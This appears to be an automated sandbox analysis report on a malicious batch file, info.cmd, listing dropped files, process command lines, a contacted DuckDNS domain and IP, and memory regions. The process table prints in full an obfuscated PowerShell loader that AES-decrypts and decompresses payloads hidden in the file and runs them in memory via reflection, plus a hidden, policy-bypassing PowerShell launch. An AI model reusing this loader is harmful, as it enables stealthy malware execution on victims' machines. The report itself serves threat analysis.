Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
info.cmd
|
ASCII text, with very long lines (58328), with CRLF line terminators
|
initial sample
|
 |
|
|
\Device\ConDrv
|
ASCII text, with very long lines (1904), with CRLF line terminators
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_a877394161d3cf447332d615808566972940da62_00000000_b2b52842-c3cd-48c2-a202-46063c34dbc7\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER414E.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER41AD.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ve00zt2.aut.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yry5vgbv.urw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\info.cmd" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd /c "set __=^&rem"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create();
$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
$aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pPLpJHM4GQSp820ezozLInZkcLGjwzAfhFyAUo/d1yU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16]
-join '')('kFkMa+H0Xjazq+yg0jtHMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var,
0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){
$liFcl=New-Object System.IO.MemoryStream(,$param_var); $YKPPP=New-Object System.IO.MemoryStream; $DrFOQ=New-Object System.IO.Compression.GZipStream($liFcl,
[IO.Compression.CompressionMode]::Decompress); $DrFOQ.CopyTo($YKPPP); $DrFOQ.Dispose(); $liFcl.Dispose(); $YKPPP.Dispose();
$YKPPP.ToArray();}function execute_function($param_var,$param2_var){ $aGqbX=[System.Reflection.Assembly]::('daoL'[-1..-4]
-join '')([byte[]]$param_var); $rErds=$aGqbX.EntryPoint; $rErds.Invoke($null, $param2_var);}$UsDBW = 'C:\Users\user\Desktop\info.cmd';$host.UI.RawUI.WindowTitle
= $UsDBW;$rybfn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UsDBW).Split([Environment]::NewLine);foreach ($bSMhM
in $rybfn) { if ($bSMhM.StartsWith('WUgLizIwoCqVFjuaxzXG')) { $FYrof=$bSMhM.Substring(20); break; }}$payloads_var=[string[]]$FYrof.Split('\');$payload1_var=decompress_function
(decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function
(decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function
$payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\wermgr.exe
|
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "5536" "1456" "1404" "1220" "0" "0" "1504" "0" "0" "0" "0" "0"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://upx.sf.net
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
newremisco2905.duckdns.org
|
163.172.59.233
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
163.172.59.233
|
newremisco2905.duckdns.org
|
United Kingdom
|
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1F6CE810000
|
heap
|
page read and write
|
||
|
1F6CE7F5000
|
heap
|
page read and write
|
||
|
1F6CE818000
|
heap
|
page read and write
|
||
|
1F6CEB10000
|
heap
|
page read and write
|
||
|
76E497F000
|
stack
|
page read and write
|
||
|
1F6D07F0000
|
heap
|
page read and write
|
||
|
1F6CEA80000
|
remote allocation
|
page read and write
|
||
|
1F6CE892000
|
heap
|
page read and write
|
||
|
1F6CEA20000
|
heap
|
page read and write
|
||
|
1F6CE780000
|
heap
|
page read and write
|
||
|
76E487F000
|
stack
|
page read and write
|
||
|
1F6CE81E000
|
heap
|
page read and write
|
||
|
1F6CE894000
|
heap
|
page read and write
|
||
|
1F6CE894000
|
heap
|
page read and write
|
||
|
76E4AFB000
|
stack
|
page read and write
|
||
|
1F6CE802000
|
heap
|
page read and write
|
||
|
1F6CE83E000
|
heap
|
page read and write
|
||
|
1F6D03B0000
|
heap
|
page read and write
|
||
|
1F6CE810000
|
heap
|
page read and write
|
||
|
1F6CE7F5000
|
heap
|
page read and write
|
||
|
1F6CE892000
|
heap
|
page read and write
|
||
|
76E453E000
|
unkown
|
page read and write
|
||
|
76E49FB000
|
stack
|
page read and write
|
||
|
1F6CE7C0000
|
heap
|
page read and write
|
||
|
1F6CE822000
|
heap
|
page read and write
|
||
|
1F6CE990000
|
heap
|
page read and write
|
||
|
1F6CEA80000
|
remote allocation
|
page read and write
|
||
|
1F6CE85C000
|
heap
|
page read and write
|
||
|
1F6CE740000
|
heap
|
page read and write
|
||
|
1F6CEB14000
|
heap
|
page read and write
|
||
|
76E48FC000
|
stack
|
page read and write
|
||
|
1F6CE7CB000
|
heap
|
page read and write
|
||
|
76E44B7000
|
stack
|
page read and write
|
||
|
1F6CE839000
|
heap
|
page read and write
|
||
|
1F6CE720000
|
heap
|
page read and write
|
||
|
76E45BE000
|
stack
|
page read and write
|
||
|
1F6CE83E000
|
heap
|
page read and write
|
||
|
1F6CE839000
|
heap
|
page read and write
|
||
|
1F6CE802000
|
heap
|
page read and write
|
||
|
1F6CE7F5000
|
heap
|
page read and write
|
||
|
1F6CE84B000
|
heap
|
page read and write
|
||
|
1F6CE824000
|
heap
|
page read and write
|
||
|
1F6CE892000
|
heap
|
page read and write
|
||
|
1F6CE83F000
|
heap
|
page read and write
|
||
|
1F6CE85C000
|
heap
|
page read and write
|
||
|
1F6CE710000
|
heap
|
page read and write
|
||
|
1F6CE84B000
|
heap
|
page read and write
|
||
|
1F6CEA80000
|
remote allocation
|
page read and write
|
||
|
76E4B7E000
|
stack
|
page read and write
|
||
|
1F6CE80F000
|
heap
|
page read and write
|
||
|
1F6CE824000
|
heap
|
page read and write
|
||
|
1F6D08F0000
|
heap
|
page read and write
|
||
|
1F6CE84B000
|
heap
|
page read and write
|
||
|
1F6CE784000
|
heap
|
page read and write
|
||
|
1F6CE894000
|
heap
|
page read and write
|
||
|
1F6CE802000
|
heap
|
page read and write
|
||
|
1F6D03BB000
|
heap
|
page read and write
|
||
|
1F6CE892000
|
heap
|
page read and write
|
||
|
1F6CE8AB000
|
heap
|
page read and write
|
||
|
1F6CE894000
|
heap
|
page read and write
|
||
|
1F6CE846000
|
heap
|
page read and write
|
||
|
1F6CE81E000
|
heap
|
page read and write
|
There are 52 hidden memdumps, click here to show them.